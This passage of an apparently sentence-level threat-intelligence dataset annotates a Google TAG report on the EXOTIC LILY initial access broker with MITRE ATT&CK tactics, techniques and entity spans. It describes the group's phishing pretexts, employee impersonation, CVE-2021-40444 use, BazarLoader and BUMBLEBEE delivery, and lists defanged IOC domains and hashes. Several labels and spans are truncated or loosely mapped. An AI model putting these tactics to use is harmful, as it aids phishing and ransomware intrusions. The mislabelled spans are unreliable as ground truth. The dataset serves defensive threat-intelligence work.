exit node 192.42.116.20 | Tor exit node 194.15.36.117 | Tor exit node 195.47.238.178 | Tor exit node 195.47.238.83 | Tor exit node", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-100_mitre_report-p1-s1-0edb34", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Exposing initial access broker with ties to Conti Threat Analysis Group Exposing initial access broker with ties to Conti Mar 17, 2022 · 6 min read Share Twitter Facebook LinkedIn", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-100_mitre_report-p1-s2-d9c98b", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "Exposing initial access broker with ties to Conti Threat Analysis Group Exposing initial access broker with ties to Conti Mar 17, 2022 · 6 min read Share Twitter Facebook LinkedIn", "sentence_text": "Mail Vlad Stolyarov Threat Analysis Group Benoit Sevens Threat Analysis Group Share Twitter Facebook LinkedIn Mail", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-100_mitre_report-p1-s3-93c5f2", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "Mail Vlad Stolyarov Threat Analysis Group Benoit Sevens Threat Analysis Group Share Twitter Facebook LinkedIn Mail", "sentence_text": "In early September 2021, Threat Analysis Group (TAG) observed a financially motivated threat actor we refer to as EXOTIC LILY, exploiting a 0day in Microsoft MSHTML ( CVE-2021-40444 ).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploits Microsoft MSHTML 0day (CVE-2021-40444) for initial access", "entities": [ { "text": "EXOTIC LILY", "start": 114, "end": 125, "label": "ThreatActor" }, { "text": " CVE-2021-40444 ", "start": 166, "end": 182, "label": "Infrastructure_Indicator" }, { "text": "Microsoft MSHTML", "start": 148, "end": 164, "label": "Infrastructure_Indicator" }, { "text": "exploiting a 0day", "start": 127, "end": 144, "label": "Action" } ] }, { "uid": "mitre-100_mitre_report-p1-s4-a9e243", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "In early September 2021, Threat Analysis Group (TAG) observed a financially motivated threat actor we refer to as EXOTIC LILY, exploiting a 0day in Microsoft MSHTML ( CVE-2021-40444 ).", "sentence_text": "Investigating this group's activity, we determined they are an Initial Access Broker (IAB) who appear to be working with the Russian cyber crime gang known as FIN12 (Mandiant, FireEye) / WIZARD SPIDER (CrowdStrike).", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Operates as Initial Access Broker collaborating with FIN12/WIZARD SPIDER", "entities": [ { "text": "nitial Access Broker (IAB) ", "start": 64, "end": 91, "label": "ThreatActor" }, { "text": "FIN12", "start": 159, "end": 164, "label": "ThreatActor" }, { "text": " WIZARD SPIDER", "start": 186, "end": 200, "label": "ThreatActor" }, { "text": "this group's ", "start": 14, "end": 27, "label": "ThreatActor" }, { "text": "working with the", "start": 108, "end": 124, "label": "Action" } ] }, { "uid": "mitre-100_mitre_report-p1-s5-e54621", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "Investigating this group's activity, we determined they are an Initial Access Broker (IAB) who appear to be working with the Russian cyber crime gang known as FIN12 (Mandiant, FireEye) / WIZARD SPIDER (CrowdStrike).", "sentence_text": "Initial access brokers are the opportunistic locksmiths of the security world, and it’s a full-time job.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-100_mitre_report-p1-s6-e2d0f0", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "Initial access brokers are the opportunistic locksmiths of the security world, and it’s a full-time job.", "sentence_text": "These groups specialize in breaching a target in order to open the doors—or the Windows—to the malicious actor with the highest bid.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Sells initial access to highest bidding malicious actors", "entities": [ { "text": "breaching a target", "start": 27, "end": 45, "label": "Action" }, { "text": "open the doors—or the Windows—to the malicious actor with the highest bid", "start": 58, "end": 131, "label": "Action" } ] }, { "uid": "mitre-100_mitre_report-p1-s7-a329b7", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "These groups specialize in breaching a target in order to open the doors—or the Windows—to the malicious actor with the highest bid.", "sentence_text": "EXOTIC LILY is a resourceful, financially motivated group whose activities appear to be closely linked with data exfiltration and deployment of human-operated ransomware such as Conti and Diavol .", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Conducts data exfiltration and deploys human-operated ransomware", "entities": [ { "text": "EXOTIC LILY", "start": 0, "end": 11, "label": "ThreatActor" }, { "text": "data exfiltration", "start": 108, "end": 125, "label": "Action" }, { "text": "deployment of human-operated ransomware", "start": 130, "end": 169, "label": "Action" }, { "text": "Conti", "start": 178, "end": 183, "label": "MalwareTool" }, { "text": "Diavol", "start": 188, "end": 194, "label": "MalwareTool" } ] }, { "uid": "mitre-100_mitre_report-p1-s8-9138ea", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "EXOTIC LILY is a resourceful, financially motivated group whose activities appear to be closely linked with data exfiltration and deployment of human-operated ransomware such as Conti and Diavol .", "sentence_text": "This level of human-interaction is rather unusual for cyber crime groups focused on mass scale operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-100_mitre_report-p1-s9-f098d7", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "This level of human-interaction is rather unusual for cyber crime groups focused on mass scale operations.", "sentence_text": "Spoofing Organizations and Identities EXOTIC LILY’s attack chain has remained relatively consistent throughout the time we’ve been tracking the group:\nOne notable technique is the use of domain and identity spoofing as a way of gaining additional credibility with a targeted organization.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1584.001", "name": "Domains" } ], "procedure": "Uses domain and identity spoofing to gain credibility with targets", "entities": [ { "text": "EXOTIC LILY’s", "start": 38, "end": 51, "label": "ThreatActor" }, { "text": "domain and identity spoofing", "start": 187, "end": 215, "label": "Action" }, { "text": "gaining additional credibility", "start": 228, "end": 258, "label": "Action" } ] }, { "uid": "mitre-100_mitre_report-p1-s10-1b3b63", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "Spoofing Organizations and Identities EXOTIC LILY’s attack chain has remained relatively consistent throughout the time we’ve been tracking the group:\nOne notable technique is the use of domain and identity spoofing as a way of gaining additional credibility with a targeted organization.", "sentence_text": "Initially, the group would create entirely fake personas posing as employees of a real company.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1585.001", "name": "Social Media Accounts" } ], "procedure": "Creates fake personas posing as employees of real companies", "entities": [ { "text": "group", "start": 15, "end": 20, "label": "ThreatActor" }, { "text": "create entirely fake personas posing as employees of a real company.", "start": 27, "end": 95, "label": "Action" } ] }, { "uid": "mitre-100_mitre_report-p1-s11-56ccbd", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "Initially, the group would create entirely fake personas posing as employees of a real company.", "sentence_text": "That would sometimes consist of creating social media profiles, personal websites and generating a fake profile picture using a public service to create an AI-generated human face.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1585.001", "name": "Social Media Accounts" } ], "procedure": "Creates comprehensive fake personas with social media, websites, and AI-generated faces", "entities": [ { "text": "creating social media profiles", "start": 32, "end": 62, "label": "Action" }, { "text": "personal websites ", "start": 64, "end": 82, "label": "Action" }, { "text": "generating a fake profile picture", "start": 86, "end": 119, "label": "Action" }, { "text": "AI-generated human face.", "start": 156, "end": 180, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-100_mitre_report-p1-s12-f6bb66", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "That would sometimes consist of creating social media profiles, personal websites and generating a fake profile picture using a public service to create an AI-generated human face.", "sentence_text": "In November 2021, the group began to impersonate real company employees by copying their personal data from social media and business databases such as RocketReach and CrunchBase.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1589", "name": "Gather Victim Identity Information" } ], "procedure": "Impersonates real employees using data from social media and business databases", "entities": [ { "text": "impersonate real company employees ", "start": 37, "end": 72, "label": "Action" }, { "text": " copying their personal data", "start": 74, "end": 102, "label": "Action" }, { "text": "social media", "start": 108, "end": 120, "label": "Infrastructure_Indicator" }, { "text": " RocketReach", "start": 151, "end": 163, "label": "Infrastructure_Indicator" }, { "text": "CrunchBase.", "start": 168, "end": 179, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-100_mitre_report-p1-s13-e1e2bd", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "In November 2021, the group began to impersonate real company employees by copying their personal data from social media and business databases such as RocketReach and CrunchBase.", "sentence_text": "One of the fake social media profiles created by EXOTIC LILY Using spoofed email accounts, attackers would then send spear phishing emails under the pretext of a business proposal, such as seeking to outsource a software development project or an information security service.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Sends spear phishing emails with business proposal pretexts using spoofed accounts", "entities": [ { "text": "EXOTIC LILY", "start": 49, "end": 60, "label": "ThreatActor" }, { "text": "send spear phishing emails", "start": 112, "end": 138, "label": "Action" }, { "text": "spoofed email accounts", "start": 67, "end": 89, "label": "Infrastructure_Indicator" }, { "text": "pretext of a business proposal", "start": 149, "end": 179, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-100_mitre_report-p1-s14-5e4383", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "One of the fake social media profiles created by EXOTIC LILY Using spoofed email accounts, attackers would then send spear phishing emails under the pretext of a business proposal, such as seeking to outsource a software development project or an information security service.", "sentence_text": "Example of an EXOTIC LILY phishing email impersonating as an employee of a legitimate company Attackers would sometimes engage in further communication with the target by attempting to schedule a meeting to discuss the project's design or requirements.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Engages in follow-up communications to schedule meetings for social engineering", "entities": [ { "text": "engage in further communication", "start": 120, "end": 151, "label": "Action" }, { "text": "EXOTIC LILY", "start": 14, "end": 25, "label": "ThreatActor" }, { "text": "discuss the project's design or requirements.", "start": 207, "end": 252, "label": "Action" }, { "text": "attempting to schedule a meeting", "start": 171, "end": 203, "label": "Action" } ] }, { "uid": "mitre-100_mitre_report-p1-s15-28977e", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "Example of an EXOTIC LILY phishing email impersonating as an employee of a legitimate company Attackers would sometimes engage in further communication with the target by attempting to schedule a meeting to discuss the project's design or requirements.", "sentence_text": "Attacker uses a file-sharing service email notification feature to send BazarLoader ISO payload Human-Operated Phishing at Scale Further evidence suggests an operator’s responsibilities might include:\ncustomizing the initial “business proposal” templates when first reaching out to a targeted organization;\nhandling further communications in order to gain affinity and trust;\nuploading malware (acquired from another group) to a file-sharing service prior to sharing it with the target.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Uses file-sharing service notifications to deliver BazarLoader ISO payloads", "entities": [ { "text": "BazarLoader ISO payload", "start": 72, "end": 95, "label": "MalwareTool" }, { "text": "uses a file-sharing service email notification feature", "start": 9, "end": 63, "label": "Action" }, { "text": "customizing the initial “business proposal” templates", "start": 201, "end": 254, "label": "Action" }, { "text": "handling further communications in order to gain affinity and trust", "start": 307, "end": 374, "label": "Action" }, { "text": "uploading malware (acquired from another group) to a file-sharing service", "start": 376, "end": 449, "label": "Action" } ] }, { "uid": "mitre-100_mitre_report-p1-s16-3d3565", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 16, "context_before": "Attacker uses a file-sharing service email notification feature to send BazarLoader ISO payload Human-Operated Phishing at Scale Further evidence suggests an operator’s responsibilities might include:\ncustomizing the initial “business proposal” templates when first reaching out to a targeted organization;\nhandling further communications in order to gain affinity and trust;\nuploading malware (acquired from another group) to a file-sharing service prior to sharing it with the target.", "sentence_text": "A breakdown of the actor’s communication activity shows the operators are working a fairly typical 9-to-5 job, with very little activity during the weekends.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Operates on 9-to-5 schedule with minimal weekend activity", "entities": [ { "text": "working a fairly typical 9-to-5 job", "start": 74, "end": 109, "label": "Action" }, { "text": "very little activity during the weekends.", "start": 116, "end": 157, "label": "Action" } ] }, { "uid": "mitre-100_mitre_report-p1-s17-900e64", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "A breakdown of the actor’s communication activity shows the operators are working a fairly typical 9-to-5 job, with very little activity during the weekends.", "sentence_text": "Distribution of the actor’s working hours suggest they might be working from a Central or an Eastern Europe timezone.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Operates from Central or Eastern European timezone", "entities": [ { "text": "working hours suggest they might be working from a Central or an Eastern Europe timezone.", "start": 28, "end": 117, "label": "Action" } ] }, { "uid": "mitre-100_mitre_report-p1-s18-4bb8f6", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "Distribution of the actor’s working hours suggest they might be working from a Central or an Eastern Europe timezone.", "sentence_text": "Breakdown of actor’s communication activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-100_mitre_report-p1-s19-f669c4", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 19, "context_before": "Breakdown of actor’s communication activity.", "sentence_text": "Deeper color indicates more activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-100_mitre_report-p1-s20-636606", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "Deeper color indicates more activity.", "sentence_text": "Malware and Attribution Although the group came to our attention initially due to its use of documents containing an exploit for CVE-2021-40444, they later switched to the delivery of ISO files with hidden BazarLoader DLLs and LNK shortcuts.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "Switches from CVE-2021-40444 exploits to ISO files with BazarLoader DLLs and LNK shortcuts", "entities": [ { "text": "CVE-2021-40444,", "start": 129, "end": 144, "label": "Infrastructure_Indicator" }, { "text": "ISO files", "start": 184, "end": 193, "label": "Infrastructure_Indicator" }, { "text": "BazarLoader DLLs", "start": 206, "end": 222, "label": "MalwareTool" }, { "text": " LNK shortcuts.", "start": 226, "end": 241, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-100_mitre_report-p1-s21-be3be4", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 21, "context_before": "Malware and Attribution Although the group came to our attention initially due to its use of documents containing an exploit for CVE-2021-40444, they later switched to the delivery of ISO files with hidden BazarLoader DLLs and LNK shortcuts.", "sentence_text": "These samples have some indicators that suggest they were custom-built to be used by the group.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Uses custom-built malware samples tailored for their operations", "entities": [ { "text": "samples", "start": 6, "end": 13, "label": "Infrastructure_Indicator" }, { "text": "ustom-built to be used by the group.", "start": 59, "end": 95, "label": "Action" } ] }, { "uid": "mitre-100_mitre_report-p1-s22-48b78e", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "These samples have some indicators that suggest they were custom-built to be used by the group.", "sentence_text": "In March, the group continued delivering ISO files, but with a DLL containing a custom loader which is a more advanced variant of a first-stage payload previously seen during CVE-2021-40444 exploitation.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Delivers ISO files with custom loader DLL as advanced first-stage payload", "entities": [ { "text": " ISO files", "start": 40, "end": 50, "label": "Infrastructure_Indicator" }, { "text": "DLL containing a custom loader", "start": 63, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "CVE-2021-40444", "start": 175, "end": 189, "label": "Infrastructure_Indicator" }, { "text": "first-stage payload", "start": 132, "end": 151, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-100_mitre_report-p1-s23-47338c", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "In March, the group continued delivering ISO files, but with a DLL containing a custom loader which is a more advanced variant of a first-stage payload previously seen during CVE-2021-40444 exploitation.", "sentence_text": "The loader can be recognized by its use of a unique user-agent “bumblebee” which both variants share.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Uses unique 'bumblebee' user-agent for custom loader identification", "entities": [ { "text": " unique user-agent “bumblebee”", "start": 44, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "loader", "start": 4, "end": 10, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-100_mitre_report-p1-s24-57dd89", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "The loader can be recognized by its use of a unique user-agent “bumblebee” which both variants share.", "sentence_text": "The malware, hence dubbed BUMBLEBEE, uses WMI to collect various system details such as OS version, user name and domain name, which are then exfiltrated in JSON format to a C2.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Collects system information via WMI and exfiltrates in JSON format to C2", "entities": [ { "text": " BUMBLEBEE", "start": 25, "end": 35, "label": "MalwareTool" }, { "text": "ses WMI to collect various system details", "start": 38, "end": 79, "label": "Action" }, { "text": " OS version, user name and domain name", "start": 87, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "exfiltrated in JSON format to a C2.", "start": 142, "end": 177, "label": "Action" }, { "text": "C2", "start": 174, "end": 176, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-100_mitre_report-p1-s25-9af5ca", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "The malware, hence dubbed BUMBLEBEE, uses WMI to collect various system details such as OS version, user name and domain name, which are then exfiltrated in JSON format to a C2.", "sentence_text": "At the time of the analysis, BUMBLEBEE was observed to fetch Cobalt Strike payloads.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "Deploys Cobalt Strike payloads via BUMBLEBEE loader", "entities": [ { "text": "BUMBLEBEE", "start": 29, "end": 38, "label": "MalwareTool" }, { "text": "Cobalt Strike", "start": 61, "end": 74, "label": "MalwareTool" } ] }, { "uid": "mitre-100_mitre_report-p1-s26-69da68", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "At the time of the analysis, BUMBLEBEE was observed to fetch Cobalt Strike payloads.", "sentence_text": "This malware can be found using this VirusTotal query EXOTIC LILY activities overlap with a group tracked as DEV-0413 (Microsoft) and were also described by Abnormal in their recent post .", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Overlaps with DEV-0413 threat group activities", "entities": [ { "text": "EXOTIC LILY", "start": 54, "end": 65, "label": "ThreatActor" }, { "text": "DEV-0413", "start": 109, "end": 117, "label": "ThreatActor" }, { "text": "Microsoft", "start": 119, "end": 128, "label": "Infrastructure_Indicator" }, { "text": "Abnormal", "start": 157, "end": 165, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-100_mitre_report-p1-s27-9345d0", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "This malware can be found using this VirusTotal query EXOTIC LILY activities overlap with a group tracked as DEV-0413 (Microsoft) and were also described by Abnormal in their recent post .", "sentence_text": "Earlier reports of attacks exploiting CVE-2021-40444 ( by Microsoft and other members of the security community) have also indicated overlaps between domains involved in the delivery chain of an exploit and infrastructure used for BazarLoader and Trickbot distribution.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Uses shared infrastructure for CVE-2021-40444 exploits, BazarLoader, and Trickbot distribution", "entities": [ { "text": "CVE-2021-40444 ", "start": 38, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "domains involved in the delivery chain ", "start": 150, "end": 189, "label": "Infrastructure_Indicator" }, { "text": "Trickbot", "start": 247, "end": 255, "label": "MalwareTool" }, { "text": "BazarLoader", "start": 231, "end": 242, "label": "MalwareTool" } ] }, { "uid": "mitre-100_mitre_report-p1-s28-2319a9", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "Earlier reports of attacks exploiting CVE-2021-40444 ( by Microsoft and other members of the security community) have also indicated overlaps between domains involved in the delivery chain of an exploit and infrastructure used for BazarLoader and Trickbot distribution.", "sentence_text": "While the nature of those relationships remains unclear, EXOTIC LILY seems to operate as a separate entity, focusing on acquiring initial access through email campaigns, with follow-up activities that include deployment of Conti and Diavol ransomware, which are performed by a different set of actors.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "EXOTIC LILY acquires initial access via email campaigns, followed by ransomware deployment (Conti and Diavol) by other actors.", "entities": [ { "text": "EXOTIC LILY", "start": 57, "end": 68, "label": "ThreatActor" }, { "text": "acquiring initial access through email campaigns", "start": 120, "end": 168, "label": "Action" }, { "text": "deployment of Conti and Diavol ransomware", "start": 209, "end": 250, "label": "Action" } ] }, { "uid": "mitre-100_mitre_report-p1-s29-c93ee3", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "While the nature of those relationships remains unclear, EXOTIC LILY seems to operate as a separate entity, focusing on acquiring initial access through email campaigns, with follow-up activities that include deployment of Conti and Diavol ransomware, which are performed by a different set of actors.", "sentence_text": "Improving User Protection As part of our efforts to combat serious threat actors, we use results of our research to improve the safety and security of our products.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-100_mitre_report-p1-s30-415244", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "Improving User Protection As part of our efforts to combat serious threat actors, we use results of our research to improve the safety and security of our products.", "sentence_text": "Additionally, we’re working with Google’s CyberCrime Investigation Group to share relevant details and indicators with law enforcement.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-100_mitre_report-p1-s31-33f911", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "Additionally, we’re working with Google’s CyberCrime Investigation Group to share relevant details and indicators with law enforcement.", "sentence_text": "TAG is committed to sharing our findings as a way of raising awareness with the security community, and with companies and individuals that might have been targeted or suffered from this threat actor’s activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-100_mitre_report-p1-s32-0027bb", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "TAG is committed to sharing our findings as a way of raising awareness with the security community, and with companies and individuals that might have been targeted or suffered from this threat actor’s activities.", "sentence_text": "We hope that improved understanding of the group’s tactics and techniques will enhance threat hunting capability and lead to stronger user protections across industry.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-100_mitre_report-p1-s33-83c2ba", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "We hope that improved understanding of the group’s tactics and techniques will enhance threat hunting capability and lead to stronger user protections across industry.", "sentence_text": "Indicators of Compromise (IOCs)\nRecent domains used in email campaigns:", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Uses recent domains in email campaigns for initial access", "entities": [ { "text": "Recent domains", "start": 32, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "used in email campaigns:", "start": 47, "end": 71, "label": "Action" } ] }, { "uid": "mitre-100_mitre_report-p1-s34-8dbe7e", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "Indicators of Compromise (IOCs)\nRecent domains used in email campaigns:", "sentence_text": "conlfex[.]com\navrobio[.]co\nelemblo[.]com\nphxmfg[.]co\nmodernmeadow[.]co\nlsoplexis[.]com\ncraneveyor[.]us\nfaustel[.]us\nlagauge[.]us\nmissionbio[.]us\nrichllndmetals[.]com\nkvnational[.]us\nprmflltration[.]com\nbrightlnsight[.]co\nbelcolnd[.]com\nawsblopharma[.]com\namevida[.]us\nrevergy[.]us\nal-ghurair[.]us\nopontia[.]us\nBazarLoader ISO samples:\n5ceb28316f29c3912332065eeaaebf59f10d79cd9388ef2a7802b9bb80d797be\n9fdec91231fe3a709c8d4ec39e25ce8c55282167c561b14917b52701494ac269\nc896ee848586dd0c61c2a821a03192a5efef1b4b4e03b48aba18eedab1b864f7\nRecent BUMBLEBEE ISO samples:\n9eacade8174f008c48ea57d43068dbce3d91093603db0511467c18252f60de32\n6214e19836c0c3c4bc94e23d6391c45ad87fdd890f6cbd3ab078650455c31dc8\n201c4d0070552d9dc06b76ee55479fc0a9dfacb6dbec6bbec5265e04644eebc9\n1fd5326034792c0f0fb00be77629a10ac9162b2f473f96072397a5d639da45dd\n01cc151149b5bf974449b00de08ce7dbf5eca77f55edd00982a959e48d017225", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Uses multiple domains and malware samples for email campaigns and payload delivery", "entities": [ { "text": "conlfex[.]com\navrobio[.]co\nelemblo[.]com\nphxmfg[.]co\nmodernmeadow[.]co\nlsoplexis[.]com\ncraneveyor[.]us\nfaustel[.]us\nlagauge[.]us\nmissionbio[.]us\nrichllndmetals[.]com\nkvnational[.]us\nprmflltration[.]com\nbrightlnsight[.]co\nbelcolnd[.]com\nawsblopharma[.]com\namevida[.]us\nrevergy[.]us\nal-ghurair[.]us\nopontia[.]us", "start": 0, "end": 309, "label": "Infrastructure_Indicator" }, { "text": "BazarLoader", "start": 310, "end": 321, "label": "MalwareTool" }, { "text": "5ceb28316f29c3912332065eeaaebf59f10d79cd9388ef2a7802b9bb80d797be\n9fdec91231fe3a709c8d4ec39e25ce8c55282167c561b14917b52701494ac269\nc896ee848586dd0c61c2a821a03192a5efef1b4b4e03b48aba18eedab1b864f7", "start": 335, "end": 529, "label": "Infrastructure_Indicator" }, { "text": "Recent BUMBLEBEE ISO samples:", "start": 530, "end": 559, "label": "MalwareTool" }, { "text": "9eacade8174f008c48ea57d43068dbce3d91093603db0511467c18252f60de32\n6214e19836c0c3c4bc94e23d6391c45ad87fdd890f6cbd3ab078650455c31dc8\n201c4d0070552d9dc06b76ee55479fc0a9dfacb6dbec6bbec5265e04644eebc9\n1fd5326034792c0f0fb00be77629a10ac9162b2f473f96072397a5d639da45dd\n01cc151149b5bf974449b00de08ce7dbf5eca77f55edd00982a959e48d017225", "start": 560, "end": 884, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-100_mitre_report-p1-s35-1bc45d", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "conlfex[.]com\navrobio[.]co\nelemblo[.]com\nphxmfg[.]co\nmodernmeadow[.]co\nlsoplexis[.]com\ncraneveyor[.]us\nfaustel[.]us\nlagauge[.]us\nmissionbio[.]us\nrichllndmetals[.]com\nkvnational[.]us\nprmflltration[.]com\nbrightlnsight[.]co\nbelcolnd[.]com\nawsblopharma[.]com\namevida[.]us\nrevergy[.]us\nal-ghurair[.]us\nopontia[.]us\nBazarLoader ISO samples:\n5ceb28316f29c3912332065eeaaebf59f10d79cd9388ef2a7802b9bb80d797be\n9fdec91231fe3a709c8d4ec39e25ce8c55282167c561b14917b52701494ac269\nc896ee848586dd0c61c2a821a03192a5efef1b4b4e03b48aba18eedab1b864f7\nRecent BUMBLEBEE ISO 